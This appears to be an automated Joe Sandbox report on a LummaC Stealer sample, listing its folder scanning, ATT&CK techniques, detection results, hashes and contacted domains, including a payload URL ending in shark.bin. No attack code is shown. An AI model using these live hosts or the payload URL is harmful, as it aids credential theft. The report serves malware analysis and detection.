Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\PIVFAGEAAV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	12 Process Injection	11 Masquerading	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	22 Virtualization/Sandbox Evasion	LSASS Memory	22 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	23 File and Directory Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	25 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
setup.exe	36%	Virustotal		Browse
setup.exe	42%	ReversingLabs	Win32.Spyware.Lummastealer
SAMPLE	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\826825\Motion.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://h1.mockupeastcoast.shop/shark.bin	0%	Avira URL Cloud	safe
https://vqaliantheart.live/oniz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
vqaliantheart.live	172.67.133.158	true	false	unknown
h1.mockupeastcoast.shop	172.67.141.59	true	false	unknown
HpKmdADIFCrtC.HpKmdADIFCrtC	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://vqaliantheart.live/oniz	false	Avira URL Cloud: safe	unknown
https://h1.mockupeastcoast.shop/shark.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	setup.exe	false	high
http://upx.sf.net	Amcache.hve.24.dr	false	high
http://www.autoitscript.com/autoit3/X	Motion.com, 00000011.00000000.1318165894.0000000000625000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.5.dr	false	high
https://sectigo.com/CPS0	setup.exe	false	high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	setup.exe	false	high
http://nsis.sf.net/NSIS_ErrorError	setup.exe	false	high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	setup.exe	false	high
http://ocsp.sectigo.com0	setup.exe	false	high
https://www.autoitscript.com/autoit3/	Mixing.13.dr, Motion.com.5.dr	false	high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	setup.exe	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.141.59	h1.mockupeastcoast.shop	United States		13335	CLOUDFLARENETUS	false
172.67.133.158	vqaliantheart.live	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1663247
Start date and time:	2025-04-11 16:11:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	setup.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@27/27@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 37 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94, 23.76.34.6, 4.245.163.56, 150.171.28.254, 40.126.28.23
Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:12:32	API Interceptor	9x Sleep call for process: Motion.com modified
10:13:19	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.141.59	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	http://lancestarfarms.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://lancestarfarms.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
172.67.133.158	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	https://www.baidu.com/link?url=es3dTXQdd_l0_QNoDZLcIrKQdOWxepez0sEEC_-T7jTwG_yTt6H6TlbYQxiOKd2T-VpbZt55m2UBZUfswQLE5_&wd#YW15Lmh1YmJhcmRAemVobmRlcmdyb3VwLmNvbQ	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://www.baidu.com/link?url=TjDnvkMlQd7qB96-cZU7oNWOUsJEViJCVaXTk73rpVo5eccMQn0sl-zBMLUvzzCn-qtQqSRmHOu98XUtmI2UKq&wd#bHVjYS5icmVkYUBib3R0ZXIuaXQ	Get hash	malicious	Phisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
vqaliantheart.live	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.133.158
vqaliantheart.live	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.133.158
h1.mockupeastcoast.shop	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59
h1.mockupeastcoast.shop	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.56.180
	http://www.gudehouse.com/	Get hash	malicious	Unknown	Browse	172.65.242.166
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.24
	http://www.gudehouse.com/	Get hash	malicious	Unknown	Browse	172.65.242.166
	Pending Payments.exe	Get hash	malicious	FormBook	Browse	172.67.159.93
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.81.228
	Set_Up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.133.158
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.81.228
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.133.158
CLOUDFLARENETUS	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.56.180
	http://www.gudehouse.com/	Get hash	malicious	Unknown	Browse	172.65.242.166
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.24
	http://www.gudehouse.com/	Get hash	malicious	Unknown	Browse	172.65.242.166
	Pending Payments.exe	Get hash	malicious	FormBook	Browse	172.67.159.93
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.81.228
	Set_Up.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.133.158
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.81.228
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.133.158

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Setup_patched.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	Set_Up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	Set_Up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	kuly.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158
	IZ8kX1cvr2	Get hash	malicious	LummaC Stealer	Browse	172.67.141.59 172.67.133.158

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\826825\Motion.com	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	hOMr8c96iX.exe	Get hash	malicious	LummaC Stealer	Browse
	MRVerify.exe	Get hash	malicious	LummaC Stealer, PrivateLoader, Vidar	Browse
	WritingsEye_patched.exe	Get hash	malicious	Vidar	Browse
	File.exe	Get hash	malicious	LummaC Stealer	Browse
	File.exe	Get hash	malicious	LummaC Stealer	Browse
	RevolutionMall.exe	Get hash	malicious	Clipboard Hijacker	Browse
	RevolutionMall.exe	Get hash	malicious	Clipboard Hijacker	Browse
	adobe_illustrator_2025_v29.4.0_(x64)_pre-cracked_patched.exe	Get hash	malicious	Clipboard Hijacker, LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Motion.com_b5bd9c28267194a9d4fcabdf4ffd497ade3aad87_7e051296_43e892a7-26a8-426f-ac5e-9361bfb4c797\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1480066133018438
Encrypted:	false
SSDEEP:	192:Ead1bKVcDc0BU/QjKBU44iOEzuiFT+Z24IO8k:3BKVcDXBU/QjnEzuiFT+Y4IO8k
MD5:	BCA5259C63F17954264FE9324CA8F323
SHA1:	22DF1512CB19A77231C0EF4E11681CE837B76E85
SHA-256:	321FBC918E3187ED5FC0403015EE3AA29A04F8391B016E2AB17F526A2127B4E7
SHA-512:	6F7B864D7B68E9D7E742DD261C0DB29CDBEF4E87329A6F317067E148A4854FCE2A20232C947AB4C218318DB2F08A90F2087697EA8256DD2885491480733D9E6D
Malicious:	false
